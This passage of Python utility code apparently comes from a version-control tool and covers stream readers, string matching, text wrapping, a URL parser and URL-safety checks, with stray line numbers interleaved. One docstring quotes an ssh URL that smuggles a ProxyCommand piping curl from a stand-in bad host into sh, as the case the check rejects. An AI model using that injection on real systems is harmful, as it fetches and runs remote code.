        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                # pull roughly 256KB ahead from the source iterator
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    # source exhausted: return what we have (may be short)
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
2516
2516
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    remaining = limit
    while True:
        nbytes = size if remaining is None else min(remaining, size)
        # nbytes == 0 means the limit is exhausted; skip the read entirely
        chunk = nbytes and f.read(nbytes)
        if not chunk:
            return
        if remaining:
            remaining -= len(chunk)
        yield chunk
2537
2537
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Wraps a source file object and serves at most the configured number
    of bytes from it; attempts to read past that cap behave as EOF.

    The wrapped file object must not be read from independently of this
    proxy, or the internal accounting gets out of sync and results are
    undefined.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            # cap reached: report EOF
            return b''

        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        data = self.read(len(b))
        if data is None:
            return None

        count = len(data)
        b[0:count] = data
        return count
2574
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            compiled = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, compiled.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    # Literal matching: exact equality, optionally case-folded.
    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2625
2633
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # Drop the domain part of an email address, if present.
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    # For "Real Name <local" leftovers, keep what follows the bracket.
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    # Truncate at the first space, then at the first dot, keeping only
    # the leading token (e.g. a first name or the local-part prefix).
    for sep in (' ', '.'):
        pos = user.find(sep)
        if pos >= 0:
            user = user[:pos]
    return user
2641
2649
def emailuser(user):
    """Return the user portion of an email address."""
    # Keep only what precedes '@'; partition() leaves the string intact
    # when no '@' is present, matching the original find()-based logic.
    user = user.partition('@')[0]
    # "Name <local" form: keep what follows the first angle bracket.
    head, sep, tail = user.partition('<')
    if sep:
        user = tail
    return user
2651
2659
def email(author):
    '''get email of author.'''
    # Slice between '<' and '>'.  When '<' is absent, find() returns -1
    # and -1 + 1 == 0 conveniently selects the start of the string.
    close = author.find('>')
    end = None if close == -1 else close
    return author[author.find('<') + 1:end]
2658
2666
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # encoding.trim is display-column aware (wide characters count as two
    # columns) and appends '...' when truncation occurs.
    return encoding.trim(text, maxlength, ellipsis='...')
2662
2670
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        # Entries are ordered largest-unit first; the first threshold the
        # magnitude reaches determines the rendering.
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # Nothing matched: fall back to the smallest (last) unit.
        return unittable[-1][2] % count

    return go
2673
2681
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # Callers use Python slicing conventions: inclusive 1-based input
    # becomes a half-open 0-based range.
    return (fromline - 1, toline)
2694
2702
# Render a byte count with the largest fitting unit.  Entries are ordered
# largest-first so the first matching threshold wins; the mix of %.0f/%.1f/%.2f
# formats keeps roughly three significant digits at every scale.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2707
2715
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        # ``encode`` is applied to every chunk before it reaches ``fp``.
        self._dest = fp
        self._transform = encode

    def close(self):
        self._dest.close()

    def flush(self):
        self._dest.flush()

    def write(self, data):
        # Transform first, then delegate; propagate the underlying
        # file object's return value.
        return self._dest.write(self._transform(data))
2723
2731
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
# (Bytes pattern: used on raw file content by tolf()/tocrlf() below.)
_eolre = remod.compile(br'\r*\n')
2728
2736
def tolf(s):
    """Normalize line endings in ``s`` to LF (collapsing CR runs before LF)."""
    return _eolre.sub('\n', s)
2731
2739
def tocrlf(s):
    """Normalize line endings in ``s`` to CRLF (collapsing CR runs first)."""
    return _eolre.sub('\r\n', s)
2734
2742
def _crlfwriter(fp):
    """Wrap ``fp`` so every written chunk has its EOLs converted to CRLF."""
    return transformingwriter(fp, tocrlf)
2737
2745
# Bind EOL-conversion helpers according to the host platform's native line
# separator: on Windows convert to/from CRLF; elsewhere the native form is
# already LF, so all three helpers degenerate to identity.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2746
2754
def escapestr(s):
    """Render non-printable bytes in ``s`` as backslash escape sequences."""
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility
    return codecs.escape_encode(s)[0]
2751
2759
def unescapestr(s):
    """Inverse of escapestr(): decode backslash escape sequences in ``s``."""
    return codecs.escape_decode(s)[0]
2754
2762
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy: round-trip through str() and the
        # local encoding instead of failing outright.
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2763
2771
def uirepr(s):
    """Return a repr() of ``s`` suitable for display to the user."""
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2767
2775
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Return a textwrap.TextWrapper that measures display columns.

    On first call this defines the wrapper class and rebinds the
    module-level name ``MBTextWrapper`` to the class itself, so later
    calls construct instances directly without re-running this factory.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr at the last character that still fits in
            # space_left display columns.
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2871
2879
def wrap(line, width, initindent='', hangindent=''):
    """Fill ``line`` to ``width`` display columns, East-Asian-width aware.

    ``initindent`` prefixes the first output line, ``hangindent`` the
    subsequent ones.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # Decode once to unicode for the width-aware wrapper, re-encode at the end.
    codec = pycompat.sysstr(encoding.encoding)
    errmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(codec, errmode)
    initindent = initindent.decode(codec, errmode)
    hangindent = hangindent.decode(codec, errmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(codec)
2887
2895
# Define iterfile(), which wraps a file object for safe line iteration.
# Only CPython 2 needs a real workaround; see the table below.
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Read raw chunks with os.read (retrying on EINTR) and carve
            # them into lines, carrying partial lines across chunks.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # Trailing partial line: keep for next chunk.
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # Regular on-disk files are treated as "fast" (EINTR-immune);
        # only wrap slow file objects such as pipes, sockets and ttys.
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2959
2967
def iterlines(iterator):
    """Yield each line contained in a stream of text chunks."""
    for chunk in iterator:
        # splitlines() drops the terminators; chunk boundaries are
        # assumed to coincide with line boundaries.
        for piece in chunk.splitlines():
            yield piece
2964
2972
def expandpath(path):
    """Expand environment variables, then '~' constructs, in ``path``."""
    expanded = os.path.expandvars(path)
    return os.path.expanduser(expanded)
2967
2975
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            # Other frozen builds (py2exe etc.): the interpreter binary
            # is the executable itself.
            return [pycompat.sysexecutable]
    return gethgcmd()
2982
2990
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # Reap the child and remember its (pid, status) so the poll loop
        # below can detect termination.
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # Re-check condfn() after detecting death to close the race
            # where the child both signalled readiness and exited.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # Always restore the previous SIGCHLD handler.
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
3017
3025
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        # Allow the prefix itself (doubled in the input) as an escape:
        # map the bare prefix character to itself.
        patterns += '|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        mapping[prefix_char] = prefix_char
    matcher = remod.compile(br'%s(%s)' % (prefix, patterns))
    # Strip the leading prefix character from each match before lookup.
    return matcher.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3042
3050
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        # Numeric ports (ints or digit strings) pass straight through.
        return int(port)
    except ValueError:
        pass

    # Non-numeric: treat as a service name.
    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
3059
3067
# canonical spellings of boolean config values, lower-cased
_booleans = dict(
    [(t, True) for t in ('1', 'yes', 'true', 'on', 'always')] +
    [(f, False) for f in ('0', 'no', 'false', 'off', 'never')])

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    lowered = s.lower()
    return _booleans.get(lowered, None)
3070
3078
3071 _hextochr = dict((a + b, chr(int(a + b, 16)))
3079 _hextochr = dict((a + b, chr(int(a + b, 16)))
3072 for a in string.hexdigits for b in string.hexdigits)
3080 for a in string.hexdigits for b in string.hexdigits)
3073
3081
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in user/passwd components by __bytes__
    _safechars = "!~*'()+"
    # characters left unquoted in the path/fragment components
    _safepchars = "/!~*'()+:\\"
    # matcher for a leading '<scheme>:' prefix
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # True while the value still looks like a local filesystem path
        # rather than a scheme-qualified URL
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        # split the fragment off first so '#' cannot leak into the other
        # components parsed below
        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                # rsplit so the user name itself may contain '@'
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        # list only the components that were present in the parsed URL
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed IPv6 literals are emitted verbatim
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # Return (url-sans-credentials, authinfo) suitable for urllib;
        # authinfo is None when the URL carries no user name.
        user, passwd = self.user, self.passwd
        try:
            # temporarily strip the credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        # Report whether this URL/path cannot be joined onto a base path.
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        # Return a local filesystem path for file:/bundle: URLs; any other
        # URL is returned as the original string that was parsed.
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3377
3385
def hasscheme(path):
    '''Report whether path carries a URL scheme (e.g. "http://...").'''
    parsed = url(path)
    return bool(parsed.scheme)
3380
3388
def hasdriveletter(path):
    '''Report whether path starts with a Windows drive letter ("c:...").

    A falsy path is returned as-is (short-circuit), matching truthiness.
    '''
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3383
3391
def urllocalpath(path):
    '''Return the local filesystem path for path, parsed without splitting
    off query or fragment parts.'''
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3386
3394
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # a host beginning with '-' would be parsed by ssh as an option
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
3401
3409
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3408
3416
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # return bytes for consistency with hidepassword(); str(u) goes
    # through encoding.strmethod and yields a unicode string on Python 3
    return bytes(u)
3414
3422
# timecount(seconds) formats a float duration with an auto-selected unit
# and precision (s/ms/us/ns, per the format strings below); the selection
# logic comes from unitcountfn().
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
